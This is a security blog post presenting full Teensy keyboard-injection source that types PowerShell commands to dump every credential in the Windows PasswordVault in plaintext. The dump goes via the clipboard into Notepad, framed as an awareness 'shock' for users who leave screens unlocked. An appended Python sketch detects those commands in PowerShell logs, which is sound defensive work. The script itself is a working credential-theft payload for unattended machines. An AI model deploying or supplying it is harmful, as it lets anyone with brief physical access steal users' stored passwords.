Teensy Script to Enforce Users Locking Screens (Non-administrative Password Dump!)

We try, time and time again, to get across the threats posed by leaving your screen unlocked. These are often batted back with responses like:

  • I don't have anything private on my screen.
  • I'm only away for a minute; nothing can happen.
  • Aside from changing my screensaver, what else can be done?

Well, this is akin to smokers declaring that nothing is wrong until there's a health scare to kick them into quitting (I know this from experience). Using this principle, let's give our end users a little slap round the face with a Teensy script.

Once plugged in, the Teensy will do the following:

  1. Launch an unelevated PowerShell prompt (no administrative access required).
  2. Run a few lines of code that dump the credentials cached in the Windows PasswordVault to the clipboard.
  3. Open Notepad.
  4. Paste a warning notice.
  5. Paste the credential dump.
  6. Switch back to the PowerShell window, clear the clipboard and close the window.

You can then lock the screen manually. Doing this via the DLL can result in accidental reboots and shutdowns, so it's not advised. I only have one password cached, but the result will look like this:

Script:

/*
  Author:         Davey Addison [ Secsi/@Supersafesecs ]
  Github:         github.com/Secsi
  Webby:          simpleinfosec.com

  Script to dump passwords stored in the Windows cached credentials area into Notepad.
  Script designed to act as a "shock treatment" to end users to enforce screen locking policies within a company.
*/

#if defined(CORE_TEENSY)
#define LED_PIN 6
#endif

void setup() {
  // allow controlling the LED and keep it lit while the script runs
  pinMode(LED_PIN, OUTPUT);
  digitalWrite(LED_PIN, HIGH);

  // give the host time to enumerate the keyboard, then clear the desktop
  delay(2000);
  show_desktop();

  delay(200);
  posh();

  // type the PowerShell commands into the unelevated prompt
  delay(500);
  Keyboard.println("$machine=hostname");   // captured but not used further
  delay(200);
  // load the WinRT PasswordVault type; the [void] cast stops the type being echoed
  Keyboard.println("[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]");
  delay(200);
  Keyboard.println("$vault = New-Object Windows.Security.Credentials.PasswordVault");
  delay(200);
  // pull every stored credential, populate its password field, and copy the lot to the clipboard
  Keyboard.println("$vault.RetrieveAll()|% { $_.RetrievePassword();$_ }|clip");
  delay(200);
  Keyboard.println("notepad");
  delay(500);
  Keyboard.println("! ! ! ! ! L O C K   Y O U R   S C R E E N ! ! ! ! !");
  Keyboard.println("We got the following with a few seconds at your machine, while you were away.");
  delay(1000);
  send_paste();
  // back to the PowerShell window: overwrite the clipboard contents, then close the window
  send_alttab();
  delay(200);
  Keyboard.println("echo off|clip");
  Keyboard.println("exit");
}

void loop() {
  // blink quickly when complete
  digitalWrite(LED_PIN, HIGH);
  delay(200);
  digitalWrite(LED_PIN, LOW);
  delay(200);
}

// Win+D: show the desktop
void show_desktop() {
  Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);
  Keyboard.set_key1(KEY_D);
  Keyboard.send_now();
  delay(500);
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
}

// Alt+Tab: switch back to the previous window
void send_alttab() {
  delay(1000);
  Keyboard.set_modifier(MODIFIERKEY_ALT);
  Keyboard.set_key1(KEY_TAB);
  Keyboard.send_now();
  delay(100);
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
}

// Ctrl+V: paste the clipboard into the focused window
void send_paste() {
  delay(1000);
  Keyboard.set_modifier(MODIFIERKEY_CTRL);
  Keyboard.set_key1(KEY_V);
  Keyboard.send_now();
  delay(100);
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
}

// open the Start menu, type "powershell" and press Enter (unelevated prompt)
void posh() {
  Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);
  Keyboard.send_now();
  delay(1000);
  Keyboard.set_modifier(0);
  Keyboard.send_now();
  delay(2000);
  Keyboard.print("powershell");

  delay(2000);
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();

  delay(200);
  Keyboard.set_key1(0);
  Keyboard.send_now();
}
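From the defender's side, the commands this script types leave a clear trace in PowerShell script block logging (Event ID 4104, which has to be enabled). The following is an added example, not part of the original post: it correlates script block text per host and flags the PasswordVault read plus clipboard pipe combination shown above. The host names and script blocks are constructed samples, not real log captures.

```python
import re
from collections import defaultdict

# Constructed sample script-block texts, keyed by host, standing in for the
# ScriptBlockText field of PowerShell Event ID 4104 (not real log captures).
SAMPLE_BLOCKS = [
    ("ws-01", "Get-ChildItem C:\\Users | Select-Object Name"),
    ("ws-02", "[void][Windows.Security.Credentials.PasswordVault,"
              "Windows.Security.Credentials,ContentType=WindowsRuntime]"),
    ("ws-02", "$vault = New-Object Windows.Security.Credentials.PasswordVault"),
    ("ws-02", "$vault.RetrieveAll()|% { $_.RetrievePassword();$_ }|clip"),
    ("ws-03", "Get-Process | Out-String | clip"),
]

# Each indicator on its own can be benign; the combination per host is what matters.
INDICATORS = {
    "vault_type": re.compile(r"Windows\.Security\.Credentials\.PasswordVault", re.I),
    "password_read": re.compile(r"\.Retrieve(All|Password)\s*\(", re.I),
    "clipboard": re.compile(r"\|\s*(clip(\.exe)?|Set-Clipboard)\b", re.I),
}


def indicators_in(text):
    """Return the set of indicator names matched by one script block."""
    return {name for name, rx in INDICATORS.items() if rx.search(text)}


def assess(blocks):
    """Correlate indicators per host.

    Returns {host: severity} for hosts whose blocks both referenced the
    PasswordVault type and read passwords from it; severity is 'high' when
    the result was also piped to the clipboard, otherwise 'medium'.
    """
    seen = defaultdict(set)
    for host, text in blocks:
        seen[host] |= indicators_in(text)
    result = {}
    for host, found in seen.items():
        if {"vault_type", "password_read"} <= found:
            result[host] = "high" if "clipboard" in found else "medium"
    return result


if __name__ == "__main__":
    for host, severity in assess(SAMPLE_BLOCKS).items():
        print(f"{host}: PasswordVault dump detected ({severity})")
```

Only ws-02 is flagged: ws-03 pipes to clip but never touches the vault, so a clipboard rule on its own would be noisy.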

 

